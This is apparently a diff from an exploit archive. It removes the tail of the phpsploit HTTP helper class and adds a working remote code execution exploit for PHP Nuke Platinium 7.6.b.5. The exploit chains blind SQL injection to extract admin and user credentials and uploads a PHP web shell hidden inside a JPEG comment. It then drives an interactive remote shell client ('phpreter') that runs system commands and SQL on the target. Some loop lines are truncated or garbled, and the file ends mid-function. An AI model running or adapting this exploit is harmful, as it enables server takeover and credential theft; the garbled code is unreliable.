-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @example $this->showheader()
-	 * 
-	 */
-	function showheader()
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @example $this->showcookie()
-	 * 
-	 */
-	function showcookie()
-	{
-		$this->cookie_str = '';
-		
-		if(!isset($this->cookie))
-		   return;
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->get('localhost/index.php?var=x')
-	 * @example $this->get('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => ''));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->get('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$iserver_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		   
-		$urlarr     = parse_url($urltarg);
-		$this->url  = 'http://'.$urlarr['host'].$urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		if(!isset($urlarr['path']) or empty($urlarr['path']))
-		   die("Error: No path precised");
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->get($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->get($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array();
-			break;
-				
-			case 'cookie':
-			$this->cookie = array();
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array();
-			$this->cookie = array();
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-?>
-
-# milw0rm.com [2008-07-01]
+
+## Date:   02/07/08
+##
+## Note
+## ****
+## I modified a bit phpsploit for this exploit,
+## because PHP Nuke plays with REQUEST_URI var ...
+## 
+## Requirements
+## ************
+## register_globals=On
+##
+## phpreter
+## ********
+## phpreter is really easy to use:
+## You can change mode using "mode=",
+## with  = sql, php or cmd
+##
+## If you want to understand how it work ...
+## read the code.
+##
+## You can take look to unchunk() function, because
+## I think you were many with this problem ...
+##
+
+
+#
+# Configuration
+#
+
+$xpl = new phpsploit();
+
+$xpl->agent('Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14');
+
+print "##\n";
+print "## PHP Nuke Platinium 7.6.b.5\n";
+print "## Remote Code Execution Exploit\n";
+print "## by Charles  F. \n";
+print "## [http://realn.free.fr/]\n";
+print "##\n";
+
+if($argc<3)
+{
+	print "##--- USAGE -----------------------------------------------\n";
+	print "## [c:\]# php nuke_platinium_exploit.php [options]\n";
+	print "##\n";
+	print "##  -url       Target URL\n";
+	print "##  -shell     If you only wan't to load again phpreter,\n";
+	print "##             specify with this param your shell URL\n";
+	print "##  -account   A GOD admin account (optional)\n";
+	print "##             password can be md5 or plain text\n";
+	print "##             user:passwd\n";
+	print "##  -bmark     How many time must pass to consider SQL\n";
+	print "##             returned true (in seconds) and how many\n";
+	print "##             operations you want SQL to do (optional)\n";
+	print "##             default: 4:6000000\n";
+	print "##\n";
+	print "## eg:\n";
+	print "## ./exploit.php -url http://target.net/ -bmark 5:4000000\n";
+	print "## ./exploit.php -url http://target.net/ -admin god:pwd\n";
+	print "## ./exploit.php -shell http://target.net/tmp_1339.php\n";
+	print "##---------------------------------------------------------\n";
+	exit();
+}
+
+# Parameters
+
+$url            = getparam('url');
+$shell_url      = getparam('shell');
+$account        = getparam('account') ? getparam('account') : '';
+$bmark          = getparam('bmark')   ? getparam('bmark')   : '4:6000000';
+
+list($bmark_time, $bmark_numb) = explode(':', $bmark);
+
+if(!$url && !$shell_url)
+{
+	print "## Ok dude, are you an idiot ?\n";
+	exit();
+}
+
+# SQL Configuration for phpreter
+
+$sql = array(
+		'config.php',
+		'$dbhost',
+		'$dbuname',
+		'$dbpass',
+		'$dbname',
+);
+
+if($shell_url)
+{
+	print "##--- SHELL -----------------------------------------------\n";
+	print "## URL: $shell_url\n";
+	print "##---------------------------------------------------------\n";
+
+	$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
+	
+	exit();
+}
+
+if(!preg_match('#ORDER by date#',$xpl->post($url.'includes/pdf.php',"what=getpdf&table=_blocked_iplist '-")))
+{
+	print "## register_globals=Off, exiting.\n";
+	print "##\n";
+	exit();
+}
+
+#
+# Admin credentials
+#
+
+if(!empty($account))
+{
+	list($aid, $pwd) = explode(':',$account);
+	if(!preg_match('#[a-f0-9]{32}#i',$pwd)) $pwd = md5($pwd);
+}
+
+print "##--- ADMIN -----------------------------------------------\n";
+
+print "## Admin ID: ";
+isset($aid) ? print $aid."\n" : $aid = bmark('aid','abcdefghijklmnopqrstuvwxyz0123456789');
+
+print "## Password: ";
+isset($pwd) ? print $pwd."\n" : $pwd = bmark('pwd','abcdef0123456789');
+
+print "##---------------------------------------------------------\n";
+print "##\n";
+
+#
+# User data
+#
+
+# We set up admin access
+
+$c_admin = base64_encode($aid.':'.$pwd);
+$xpl->addcookie('admin', urlencode($c_admin));
+
+# Ok, now, we need an user for the upload
+
+$query = "SELECT CONCAT(0x3a3a3a,user_id,0x3a,username,0x3a,user_email,0x3a,user_password,0x3a3a3a) FROM nuke_users ORDER BY user_id DESC LIMIT 1";
+$data = sqlexec($query);
+
+$data = explode(':::',$data);
+list($user_id, $user_name, $user_mail, $user_pwd) = explode(':',$data[1]);
+
+$c_user = base64_encode($user_id.':'.$user_name.':'.$user_pwd);
+$xpl->addcookie('user', urlencode($c_user));
+
+# We need a valid SID
+$xpl->get($url.'modules.php?name=Forums&file=profile&mode=editprofile');
+preg_match('#sid" value="([a-f0-9]{32})#i', $xpl->getcontent(), $c_sid);
+
+$c_sid = $c_sid[1];
+$xpl->addcookie('_sid',$c_sid);
+
+print "##--- USER ------------------------------------------------\n";
+print "## User ID : ".$user_id."\n";
+print "## Name    : ".$user_name."\n";
+print "## Mail    : ".$user_mail."\n";
+print "## Password: ".$user_pwd."\n";
+print "##---------------------------------------------------------\n";
+print "##\n";
+
+#
+# Cookies
+#
+
+print "##--- COOKIES -----------------------------------\n";
+print "## user=".$c_user."\n";
+print "## admin=".$c_admin."\n";
+print "##---------------------------------------------------------\n";
+print "##\n";
+
+#
+# File upload
+#
+
+print "## Uploading the file ";
+$rand_filename = 'tmp_'.rand().'.php';
+
+# Step #1: avatar_path='w00t.php\0'
+sqlexec("UPDATE nuke_bbconfig SET config_value='$rand_filename\\0' WHERE config_name='avatar_path'");
+print ".";
+
+# Step #2: JPEG upload (bypassing restrictions)
+
+# $c0de contains as a jpeg comment
+# print '-:-';eval(stripslashes($_SERVER['HTTP_SHELL']));print '-:-';
+#
+# To people who is laughing to me when I stripslashes() the header:
+# On specifics servers, HTTP headers are addslashed.
+# This gave, in fact, the attack #2 in my Nuked-Klan sploit.
+#
+$c0de = ""
+. "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x60"
+. "\x00\x60\x00\x00\xff\xdb\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08"
+. "\x07\x07\x07\x09\x09\x08\x0a\x0c\x14\x0d\x0c\x0b\x0b\x0c\x19\x12"
+. "\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20"
+. "\x22\x2c\x23\x1c\x1c\x28\x37\x29\x2c\x30\x31\x34\x34\x34\x1f\x27"
+. "\x39\x3d\x38\x32\x3c\x2e\x33\x34\x32\xff\xdb\x00\x43\x01\x09\x09"
+. "\x09\x0c\x0b\x0c\x18\x0d\x0d\x18\x32\x21\x1c\x21\x32\x32\x32\x32"
+. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
+. "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xff\xfe"
+. "\x00\x4e\x3c\x3f\x70\x68\x70\x20\x70\x72\x69\x6e\x74\x20\x27\x2d"
+. "\x3a\x2d\x27\x3b\x65\x76\x61\x6c\x28\x73\x74\x72\x69\x70\x73\x6c"
+. "\x61\x73\x68\x65\x73\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27"
+. "\x48\x54\x54\x50\x5f\x53\x48\x45\x4c\x4c\x27\x5d\x29\x29\x3b\x70"
+. "\x72\x69\x6e\x74\x20\x27\x2d\x3a\x2d\x27\x3b\x20\x3f\x3e\xff\xc0"
+. "\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03\x11"
+. "\x01\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00"
+. "\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
+. "\x0a\x0b\xff\xc4\x00\xb5\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05"
+. "\x05\x04\x04\x00\x00\x01\x7d\x01\x02\x03\x00\x04\x11\x05\x12\x21"
+. "\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xa1\x08\x23"
+. "\x42\xb1\xc1\x15\x52\xd1\xf0\x24\x33\x62\x72\x82\x09\x0a\x16\x17"
+. "\x18\x19\x1a\x25\x26\x27\x28\x29\x2a\x34\x35\x36\x37\x38\x39\x3a"
+. "\x43\x44\x45\x46\x47\x48\x49\x4a\x53\x54\x55\x56\x57\x58\x59\x5a"
+. "\x63\x64\x65\x66\x67\x68\x69\x6a\x73\x74\x75\x76\x77\x78\x79\x7a"
+. "\x83\x84\x85\x86\x87\x88\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99"
+. "\x9a\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7"
+. "\xb8\xb9\xba\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5"
+. "\xd6\xd7\xd8\xd9\xda\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf1"
+. "\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xff\xc4\x00\x1f\x01\x00\x03"
+. "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x01"
+. "\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\xff\xc4\x00\xb5\x11\x00"
+. "\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00"
+. "\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13"
+. "\x22\x32\x81\x08\x14\x42\x91\xa1\xb1\xc1\x09\x23\x33\x52\xf0\x15"
+. "\x62\x72\xd1\x0a\x16\x24\x34\xe1\x25\xf1\x17\x18\x19\x1a\x26\x27"
+. "\x28\x29\x2a\x35\x36\x37\x38\x39\x3a\x43\x44\x45\x46\x47\x48\x49"
+. "\x4a\x53\x54\x55\x56\x57\x58\x59\x5a\x63\x64\x65\x66\x67\x68\x69"
+. "\x6a\x73\x74\x75\x76\x77\x78\x79\x7a\x82\x83\x84\x85\x86\x87\x88"
+. "\x89\x8a\x92\x93\x94\x95\x96\x97\x98\x99\x9a\xa2\xa3\xa4\xa5\xa6"
+. "\xa7\xa8\xa9\xaa\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xc2\xc3\xc4"
+. "\xc5\xc6\xc7\xc8\xc9\xca\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xe2"
+. "\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9"
+. "\xfa\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf7"
+. "\xfa\x28\xa2\x80\x3f\xff\xd9\xd9";
+
+$data = array(
+		frmdt_url => $url.'modules.php?name=Forums&file=profile',
+		'avatar' => array(frmdt_filename => '1.jpg', frmdt_type => 'image/jpeg', frmdt_content => $c0de),
+		'username' => $user_name,       'email' => $user_mail,
+		'cur_password' => '',           'new_password' => '',
+		'password_confirm' => '',       'icq' => '',
+		'aim' => '',                    'msn' => '',
+		'yim' => '',                    'website' => '',
+		'location' => '',               'occupation' => '',
+		'interests' => '',              'b_day' => '1',
+		'b_md' => '1',                  'b_year' => '1111',
+		'gender' => '1',                'viewemail' => '0',
+		'hideonline' => '1',            'notifyreply' => '0',
+		'notifypm' => '0',              'popup_pm' => '0',
+		'attachsig' => '1',             'allowbbcode' => '1',
+		'allowhtml' => '1',             'allowsmilies' => '1',
+		'showquickreply' => '0',        'user_wordwrap' => '70',
+		'language' => 'english',        'style' => '1',
+		'timezone' => '-6',             'dateformat' => 'Y-m-d, H:i:s',
+		'MAX_FILE_SIZE' => '99999',     'avatarurl' => '',
+		'avatarremoteurl' => '',        'mode' => 'editprofile',
+		'agreed' => 'true',             'coppa' => '0',
+		'sid' => $c_sid,                'user_id' => $user_id,
+		'current_email' => $user_mail,  'submit' => 'Submit',
+);
+
+$xpl->formdata($data);
+print ".";
+
+# Step #3: avatar_path='modules/Forums/images/avatars'
+sqlexec("UPDATE nuke_bbconfig SET config_value='modules/Forums/images/avatars' WHERE config_name='avatar_path'");
+print ".\n";
+
+# Shell is uploaded, let's load it
+
+$shell_url  = $url.$rand_filename;
+
+print "##\n";
+print "##--- SHELL -----------------------------------------------\n";
+print "## URL: $shell_url\n";
+print "##---------------------------------------------------------\n";
+
+$shell = new phpreter($shell_url, '-:-(.*)-:-', 'cmd', $sql, false);
+
+#
+# Execute SQL Queries
+#
+function sqlexec($query)
+{
+	global $xpl,$url;
+	
+	$xpl->post($url.'modules/Forums/admin/admin_genesismyadmin.php','this_query='.urlencode($query).'&submit=&with_selected=optimize');
+	
+	return $xpl->getcontent();
+}
+
+#
+# Bmark SQL Injection Function
+#
+function bmark($query,$charset)
+{
+	global $xpl,$url,$data,$bmark_time,$bmark_numb;
+	
+	$d=0; $v='';$max=32;
+	
+	$query = 'SELECT '.$query.' FROM nuke_authors WHERE radminsuper=1 ORDER BY aid LIMIT 1';
+	
+	$data = "what=getpdf&table=_blocked_iplist+WHERE+IF((),BENCHMARK($bmark_numb,MD5(0x616161)),1)=1 --";
+	
+	while($d<$max)
+	{
+		$d++;
+		for($z=0;$zpost($url."includes/pdf.php", str_replace('',$sql,$data) );
+			
+			if(time()-$date>$bmark_time)
+			{
+				print strtolower(chr($f));
+				$v .= chr($f);
+				break;
+			}
+		}
+		if(strlen($v)==$save) break;
+		$save = strlen($v);
+	}
+	
+	print "\n";
+	return $v;
+}
+
+function getparam($param,$opt='')
+{
+	global $argv;
+	foreach($argv as $value => $key)
+	{
+		if($key == '-'.$param) return $argv[$value+1];
+	}
+	if($opt) exit("\n-$param parameter required");
+	else return;
+}
+
+
+/*
+ * Copyright (c) real
+ *
+ * This program is free software; you can redistribute it and/or 
+ * modify it under the terms of the GNU General Public License 
+ * as published by the Free Software Foundation; either version 2 
+ * of the License, or (at your option) any later version. 
+ * 
+ * This program is distributed in the hope that it will be useful, 
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of 
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
+ * GNU General Public License for more details. 
+ * 
+ * You should have received a copy of the GNU General Public License 
+ * along with this program; if not, write to the Free Software 
+ * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
+ *
+ * TITLE:          PHPreter
+ * AUTHOR:         Charles "real" F.
+ * VERSION:        1.0
+ * LICENSE:        GNU General Public License
+ *
+ * This is a really simple class with permits to exec SQL, PHP or CMD
+ * on a remote host using the HTTP "Shell" header.
+ *
+ */
+
+class phpreter
+{
+	var $url;
+	var $host;
+	var $port;
+	var $page;
+	
+	var $mode;
+	
+	var $ssql;
+	
+	var $prompt;
+	var $phost;
+	
+	var $regex;
+	var $data;
+	
+	/**
+	 * __construct()
+	 *
+	 * @param url      The url of the remote shell.
+	 * @param regexp   The regex to catch cmd result.
+	 * @param mode     Mode: php, sql or cmd.
+	 * @param sql      An array with the file to include,
+	 *                 and sql vars
+	 * @param clear    Determines if clear() is called
+	 *                 on startup
+	 */
+	function __construct($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true)
+	{
+		$this->url = $url;
+		
+		$this->regex = '#'.$regexp.'#is';
+		
+		#
+		# Set important data
+		#
+		
+		$infos = parse_url($this->url);
+		$this->host = $infos['host'];
+		$this->port = isset($infos['port']) ? $infos['port'] : 80;
+		$this->page = $infos['path'];
+		unset($infos);
+		
+		# www.(site).com
+		$host_tmp = explode('.',$this->host);
+		$this->phost = $host_tmp[ count($host_tmp)-2 ];
+		unset($host_tmp);
+		
+		#
+		# Set up MySQL connection string
+		#
+		if(!sizeof($sql)) $this->ssql = '';
+		elseif(sizeof($sql)==5)
+		{
+			$this->ssql = "include('$sql[0]');"
+			            . "mysql_connect($sql[1], $sql[2], $sql[3]);"
+				    . "mysql_select_db($sql[4]);";
+		}
+		else
+		{
+			$this->ssql = ""
+			            . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');"
+				    . "mysql_select_db('$sql[3]');";
+		}
+		
+		$this->setmode($mode);
+		
+		#
+		# Main Loop
+		#
+
+		if($clear) $this->clear();
+		print $this->prompt;
+
+		while(!preg_match('#^(quit|exit|close)$#i',($cmd = trim(fgets(STDIN)))))
+		{
+			# change mode
+			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) $this->setmode($array[3]);
+			
+			# clear data
+			elseif(preg_match('#^clear$#i',$cmd)) $this->clear();
+			
+			# else
+			else print $this->exec($cmd);
+			
+			print $this->prompt;
+		}
+	}
+	
+	/**
+	 * clear()
+	 * Just clears ouput, printing '\n'x50
+	 */
+	function clear()
+	{
+		print str_repeat("\n",50);
+		return 0;
+	}
+	
+	/**
+	 * setmode()
+	 * Set mode (PHP, CMD, SQL)
+	 * You don't have to call it.
+	 * use mode=[php|cmd|sql] instead,
+	 * in the prompt.
+	 */
+	function setmode($newmode)
+	{
+		$this->mode = strtolower($newmode);
+		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
+		
+		switch($this->mode)
+		{
+			case 'cmd':
+				$this->data = 'system(\'\');';
+				break;
+			case 'php':
+				$this->data = '';
+				break;
+			case 'sql':
+				$this->data = $this->ssql
+				            . '$q = mysql_query(\'\') or print(mysql_error());'
+					    . 'print str_repeat("-",50)."\n";'
+					    . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))'
+					    . '{'
+					    . 	'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";'
+					    . 	'print str_repeat("-",50)."\n";'
+					    . '}';
+				break;
+		}
+		return $this->mode;
+	}
+
+	/**
+	 * exec()
+	 * Execute any query and catch the result.
+	 * You don't have to call it.
+	 */
+	function exec($cmd)
+	{
+		if(!strlen($this->data))	$shell = $cmd;
+		else				$shell = str_replace('',addslashes($cmd),$this->data);
+		
+		$fp = fsockopen($this->host, $this->port, &$errno, &$errstr, 30);
+		
+		$req  = "GET ".$this->page." HTTP/1.1\r\n";
+		$req .= "Host: ". $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) ."\r\n";
+		$req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
+		$req .= "Shell: $shell\r\n";
+		$req .= "Content-transfert-encoding: base64\r\n";
+		$req .= "Connection: close\r\n\r\n";
+		
+		unset($shell);
+
+		fputs($fp,$req);
+		
+		$content = '';
+		while(!feof($fp)) $content .= fgets($fp,128);
+		
+		fclose($fp);
+		
+		# Remove headers
+		$data = explode("\r\n\r\n",$content);
+		array_shift($data);
+		$content = implode("\r\n\r\n",$data);
+		
+		$content = $this->unchunk($content);
+	
+		preg_match($this->regex,$content,$data);
+		
+		if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n";
+		
+		return $data[1];
+	}
+	
+	/**
+	 * unchunk()
+	 * This function aims to remove chunked content sizes which
+	 * are putted by apache server when it uses chunked
+	 * transfert-encoding.
+	 */
+	function unchunk($data)
+	{
+		$dsize  = 1;
+		$offset = 0;
+		
+		while($dsize>0)
+		{
+			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
+			
